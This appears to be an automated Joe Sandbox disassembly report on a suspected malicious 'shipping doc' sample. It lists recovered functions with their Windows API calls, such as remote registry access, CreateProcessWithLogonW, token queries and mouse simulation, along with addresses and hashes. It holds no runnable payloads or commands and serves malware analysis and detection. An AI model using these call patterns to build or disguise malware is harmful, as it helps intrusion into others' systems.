Part of subcall function 00F48725: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00F5D6D4,?,?,?), ref: 00F48774

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
String ID:
API String ID: 1923757996-0
Opcode ID: 5aba7c2097bdd721fd8371f75989977ff5364931c489613e484b77b46fa78b2b
Instruction ID: e6ce9814105b829c01b62a32313026592dadfa284350ee64f011c7b2eacec229
Opcode Fuzzy Hash: 5aba7c2097bdd721fd8371f75989977ff5364931c489613e484b77b46fa78b2b
Instruction Fuzzy Hash: 5DA1E131604342AFC314EF24C896F2A7BA5BF85318F54894CF8568B2A3DB35ED45EB91

Function 00F7618E Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F68269,00F68269,?,?,?,00F763DF,00000001,00000001,8BE85006), ref: 00F761E8
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F763DF,00000001,00000001,8BE85006,?,?,?), ref: 00F7626E
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F76368
__freea.LIBCMT ref: 00F76375

Part of subcall function 00F737B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00F5FD75,?,?,00F4B63D,00000000,?,?,?,00FB106C,00FDD0D0,?,00F8242E), ref: 00F737E2

__freea.LIBCMT ref: 00F7637E
__freea.LIBCMT ref: 00F763A3

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: fbf97be1c00972ca2fe83c617f430c3b4a92786e3969e4a549e1080a3baaab63
Instruction ID: d5a064235db3a20995993197b6a440e46c2c8d2e6de630c0e1d37fffbed31282
Opcode Fuzzy Hash: fbf97be1c00972ca2fe83c617f430c3b4a92786e3969e4a549e1080a3baaab63
Instruction Fuzzy Hash: 6B51F472A00616AFEB258F64CC81EAF77B9EF45760B14862AFC0DD6241DB34DC44E692

Function 00FCBB02 Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

Part of subcall function 00FCC8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FCB5D5,?,?), ref: 00FCC8DC
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC918
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC98F
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC9C5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCBBF1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FCBC4C
RegCloseKey.ADVAPI32(00000000), ref: 00FCBC91
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00FCBCC0
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FCBD1A
RegCloseKey.ADVAPI32(?), ref: 00FCBD26

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 203736ac86537e362273f13e1f530e1af9e9c5c30a04cbdb34ea953b011b0caa
Instruction ID: 41b4cd87ac68289fefa7901f2838f662dbf33b0f4ace53a6a00f1900efbb7221
Opcode Fuzzy Hash: 203736ac86537e362273f13e1f530e1af9e9c5c30a04cbdb34ea953b011b0caa
Instruction Fuzzy Hash: 0881C035608242AFC714DF24C986F2ABBE5FF84314F04885CF4598B2A2DB31ED45EB92

Function 00F9F696 Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00F9F6A2
SysAllocString.OLEAUT32(?), ref: 00F9F749
VariantCopy.OLEAUT32(00F9F94D,00000000), ref: 00F9F772
VariantClear.OLEAUT32(00F9F94D), ref: 00F9F796
VariantCopy.OLEAUT32(00F9F94D,00000000), ref: 00F9F79A
VariantClear.OLEAUT32(?), ref: 00F9F7A4

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 0236997defc85a741095aaee634ee4f20ee835942b82c33a0db065d5c67dbd0c
Instruction ID: 42618593487476c034104567b999ddd19d334dacbd25d0d8df3d771a7daa5db3
Opcode Fuzzy Hash: 0236997defc85a741095aaee634ee4f20ee835942b82c33a0db065d5c67dbd0c
Instruction Fuzzy Hash: BC512C32910311E6EF64AF64DC95729B3A8EF45310F244477ED05EF291DB748848FB91

Function 00FB902A Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00F48FA0: _wcslen.LIBCMT ref: 00F48FA5

Part of subcall function 00F484E7: _wcslen.LIBCMT ref: 00F484FA

GetOpenFileNameW.COMDLG32(00000058), ref: 00FB9403
_wcslen.LIBCMT ref: 00FB9424
_wcslen.LIBCMT ref: 00FB944B
GetSaveFileNameW.COMDLG32(00000058), ref: 00FB94A3

Strings

X, xrefs: 00FB9330

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: e84f93dc91b513c72b26438712940b6d23ace3b965dd334ae44fce2883f1c19d
Instruction ID: d482ec61e383ab1cbcf6e6418b172caa765a5779680d9182da974b2ce340e654
Opcode Fuzzy Hash: e84f93dc91b513c72b26438712940b6d23ace3b965dd334ae44fce2883f1c19d
Instruction Fuzzy Hash: ACE1B331A08340DFC724EF25C885AAABBE1BF85310F04856DF9898B292DB74DD05DF92

Function 00F5A692 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00F5B021: GetWindowLongW.USER32(?,000000EB), ref: 00F5B032

BeginPaint.USER32(?,?,?), ref: 00F5A6C7
GetWindowRect.USER32(?,?), ref: 00F5A72B
ScreenToClient.USER32(?,?), ref: 00F5A748
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F5A759
EndPaint.USER32(?,?,?,?,?), ref: 00F5A7A7
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F97BA7

Part of subcall function 00F5A7BF: BeginPath.GDI32(00000000), ref: 00F5A7DD

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 745647ae932aebf1ed0e809ac7d98102d2b3dfc1f5db35cb3c587f271fac1fe5
Instruction ID: 4622491f6579ba0d384b897badee98fa06dfbb22f23c974a20f9f151199e4e2b
Opcode Fuzzy Hash: 745647ae932aebf1ed0e809ac7d98102d2b3dfc1f5db35cb3c587f271fac1fe5
Instruction Fuzzy Hash: A841E2311053019FD720DF24D884FBA7BB9EB49331F140629FAA4872A2C7399849EB62

Function 00FB070D Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00FB072A
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00FB0765
EnterCriticalSection.KERNEL32(?), ref: 00FB0781
LeaveCriticalSection.KERNEL32(?), ref: 00FB07FA
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00FB0811
InterlockedExchange.KERNEL32(?,000001F6), ref: 00FB083F

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 21a4249f7fe32bd56285d003d0b6383a1c254cf78056f24e48b3b81841343fa0
Instruction ID: c379862cce0dab2738bec122631c235e9812bb726ed87988584f8af00b912ecf
Opcode Fuzzy Hash: 21a4249f7fe32bd56285d003d0b6383a1c254cf78056f24e48b3b81841343fa0
Instruction Fuzzy Hash: 28415C71900205EFDF05AF64DC85AAAB7B9FF48311F1480A5ED009A296DB34EE55EFA0

Function 00FD80CD Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000,?,?,?,?,00F9767D), ref: 00FD813E
EnableWindow.USER32(00000000,00000000), ref: 00FD8164
ShowWindow.USER32(?,00000000,?,?,?,?,00F9767D), ref: 00FD81C3
ShowWindow.USER32(00000000,00000004,?,?,?,?,00F9767D), ref: 00FD81D7
EnableWindow.USER32(00000000,00000001), ref: 00FD81FD
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00FD8221

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 1a7a07c2525bbb70c762321176f2423e770dc937bc2ae2a9f2c5eed8bda8c6ae
Instruction ID: fd33a0dddc8176dabeb3936b17e678b5a4386e1b7f3897f9ee6f8a628572ef35
Opcode Fuzzy Hash: 1a7a07c2525bbb70c762321176f2423e770dc937bc2ae2a9f2c5eed8bda8c6ae
Instruction Fuzzy Hash: 0841C834A01244EFDB25CF24C889BA57BF3FB49765F1C416AE5584B362CB36984BEB40

Function 00FC2201 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00FC220F

Part of subcall function 00FBE40C: GetWindowRect.USER32(?,?), ref: 00FBE424

GetDesktopWindow.USER32 ref: 00FC2239
GetWindowRect.USER32(00000000), ref: 00FC2240
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00FC227C
GetCursorPos.USER32(?), ref: 00FC22A8
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FC2306

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 9174271afb147ff6c3dac8f7474601f250fd72c130f6285963a49327c198e67d
Instruction ID: 094b227e0d92266ac133bb2230019fed390db2eaff8cb175031f64f3f64eae47
Opcode Fuzzy Hash: 9174271afb147ff6c3dac8f7474601f250fd72c130f6285963a49327c198e67d
Instruction Fuzzy Hash: 3B31CF7290531AAFD720DF24DC49F9ABBAAFF84310F00091EF48997191CB35EA04DB92

Function 00FA4BD3 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00FA4BEB
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FA4C08
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FA4C40
_wcslen.LIBCMT ref: 00FA4C5E
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FA4C66
_wcsstr.LIBVCRUNTIME ref: 00FA4C70

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: db0e2cf645b5b247d829a3ca91173a2f3ee23aef244146f9b247dccf513cd6fc
Instruction ID: 61ff8e0dbeda172097aedbcc5d35ebbc02d9cb7346d107bc25c2a84240d3e2c6
Opcode Fuzzy Hash: db0e2cf645b5b247d829a3ca91173a2f3ee23aef244146f9b247dccf513cd6fc
Instruction Fuzzy Hash: 2D2149726052047AEB155B78DC05E3B7BADDF86770F10803AF80DCA082EEA4EC00B2A0

Function 00FB573C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F45922,?,?,00F448AA,?,?,?,00000000), ref: 00F4594D

_wcslen.LIBCMT ref: 00FB5799
CoInitialize.OLE32(00000000), ref: 00FB58B3
CoCreateInstance.OLE32(00FDFD14,00000000,00000001,00FDFB84,?), ref: 00FB58CC
CoUninitialize.OLE32 ref: 00FB58EA

Strings

.lnk, xrefs: 00FB5794, 00FB57DF, 00FB58A3

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 1b713ea73cd64459a6c5c849cbfa8d849519144991e8198307fb8c28635946ef
Instruction ID: 8700b1e2659d950b163556576fceca6fa60b00e772011561d206ca597fa0bdbf
Opcode Fuzzy Hash: 1b713ea73cd64459a6c5c849cbfa8d849519144991e8198307fb8c28635946ef
Instruction Fuzzy Hash: D2D14371A047019FC714DF16C880A6ABBE6FF89B14F148959F8869B361CB39EC05DF92

Function 00FD7B91 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00FD7BD5
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00FD7BFA
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00FD7C12
GetSystemMetrics.USER32(00000004), ref: 00FD7C3B
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00FBB6CB,00000000), ref: 00FD7C5B

Part of subcall function 00F5B021: GetWindowLongW.USER32(?,000000EB), ref: 00F5B032

GetSystemMetrics.USER32(00000004), ref: 00FD7C46

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: ab0adaf392480c2a10690b274d083685bdd3f4879872623075bfb0d7f0ce0693
Instruction ID: c45a8f2ba497b0140376f7f030c03c9f6ec8343191fa33f84276368b69d0e6ab
Opcode Fuzzy Hash: ab0adaf392480c2a10690b274d083685bdd3f4879872623075bfb0d7f0ce0693
Instruction Fuzzy Hash: A621B7716243459FCB246F38CC44B6E37A6FB45335F18462AF926C63E0E7349940EB50

Function 00FA16A1 Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA0EF8: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FA0F0E
Part of subcall function 00FA0EF8: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FA0F1A
Part of subcall function 00FA0EF8: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FA0F29
Part of subcall function 00FA0EF8: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FA0F30
Part of subcall function 00FA0EF8: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FA0F46

GetLengthSid.ADVAPI32(?,00000000,00FA1279), ref: 00FA16F2
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FA16FE
HeapAlloc.KERNEL32(00000000), ref: 00FA1705
CopySid.ADVAPI32(00000000,00000000,?), ref: 00FA171E
GetProcessHeap.KERNEL32(00000000,00000000,00FA1279), ref: 00FA1732
HeapFree.KERNEL32(00000000), ref: 00FA1739

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 2f307ae3623ff4c9286d104cfa46a901877985dd85e80b1cbf875a68391b5646
Instruction ID: 4efd0f3ffc9301910ba3486f12a8422bcea1080588609b3073987d0f13c5386d
Opcode Fuzzy Hash: 2f307ae3623ff4c9286d104cfa46a901877985dd85e80b1cbf875a68391b5646
Instruction Fuzzy Hash: F811D0B2A01209FFDB109FB4CC49BAF7BA9FF463A5F158019E842E7251D7359901EB60

Function 00FA1412 Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FA1443
OpenProcessToken.ADVAPI32(00000000), ref: 00FA144A
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FA1459
CloseHandle.KERNEL32(00000004), ref: 00FA1464
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FA1493
DestroyEnvironmentBlock.USERENV(00000000), ref: 00FA14A7

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: dfb4218934658551d96908d2efd51142268991571edecdfec1ccc259fa6048f7
Instruction ID: 78c19bbc7d416620eed9b3e8a28a5fc549ef17b27fcd5907835451d90ad600de
Opcode Fuzzy Hash: dfb4218934658551d96908d2efd51142268991571edecdfec1ccc259fa6048f7
Instruction Fuzzy Hash: A31117B250120EABDF11CFA8ED49FDA7BA9FF0A714F158115FE00A2060C3758D64EB60

Function 00F63312 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F63309,00F62F75), ref: 00F63320
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F6332E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F63347
SetLastError.KERNEL32(00000000,?,00F63309,00F62F75), ref: 00F63399

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b3a6ebf0816dfbdc8728fab8eb03ef5b0c395b37f37918f29f1dbd68709336a2
Instruction ID: c10fa04401ae1f29a39e00fcd7393328e9e032f20763a6eeab9aede5be4ec0e1
Opcode Fuzzy Hash: b3a6ebf0816dfbdc8728fab8eb03ef5b0c395b37f37918f29f1dbd68709336a2
Instruction Fuzzy Hash: 6C01D433A093116EFA252774BD8AA263794EB06775720032AF014852E6EF174D11B344

Function 00F72D04 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F64973,?,?,?,00F66502,?,?,?,?), ref: 00F72D08
_free.LIBCMT ref: 00F72D3B
_free.LIBCMT ref: 00F72D63
SetLastError.KERNEL32(00000000,?,?,?), ref: 00F72D70
SetLastError.KERNEL32(00000000,?,?,?), ref: 00F72D7C
_abort.LIBCMT ref: 00F72D82

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
